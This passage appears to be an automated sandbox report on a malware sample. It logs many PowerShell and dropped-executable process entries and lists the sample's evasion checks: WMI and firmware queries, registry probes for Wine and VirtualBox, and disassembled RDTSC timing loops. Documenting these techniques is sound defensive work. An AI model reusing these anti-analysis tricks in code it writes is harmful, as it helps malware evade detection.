Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B3CF9 second address: 10B3D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE66CFB4FD6h 0x0000000a popad 0x0000000b jmp 00007FE66CFB4FDDh 0x00000010 pushad 0x00000011 pushad 0x00000012 jp 00007FE66CFB4FD6h 0x00000018 jmp 00007FE66CFB4FDDh 0x0000001d js 00007FE66CFB4FD6h 0x00000023 jmp 00007FE66CFB4FE9h 0x00000028 popad 0x00000029 jl 00007FE66CFB4FDAh 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 jc 00007FE66CFB4FD6h 0x0000003b push esi 0x0000003c pop esi 0x0000003d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 109F4EC second address: 109F4F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 109F4F2 second address: 109F4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2CF0 second address: 10B2CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2CF4 second address: 10B2CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2CFD second address: 10B2D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2D0A second address: 10B2D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2D16 second address: 10B2D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2D1C second address: 10B2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2D22 second address: 10B2D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B2D27 second address: 10B2D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE66CFB4FE4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B31CA second address: 10B31D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B31D0 second address: 10B31D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B3430 second address: 10B346D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FE66CCE605Eh 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007FE66CCE6056h 0x00000016 push esi 0x00000017 jmp 00007FE66CCE6061h 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE66CCE6062h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B346D second address: 10B3473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B35FF second address: 10B3603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B3603 second address: 10B3609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5BC5 second address: 10B5BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5BC9 second address: 10B5C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE66CFB4FDCh 0x0000000c jnc 00007FE66CFB4FD6h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FE66CFB4FD8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 add di, 4967h 0x00000035 push 00000000h 0x00000037 jnp 00007FE66CFB4FDAh 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 pop edi 0x00000041 sub edi, dword ptr [ebp+122D2C80h] 0x00000047 push 8E62B6A8h 0x0000004c pushad 0x0000004d push ebx 0x0000004e pushad 0x0000004f popad 0x00000050 pop ebx 0x00000051 pushad 0x00000052 push eax 0x00000053 pop eax 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
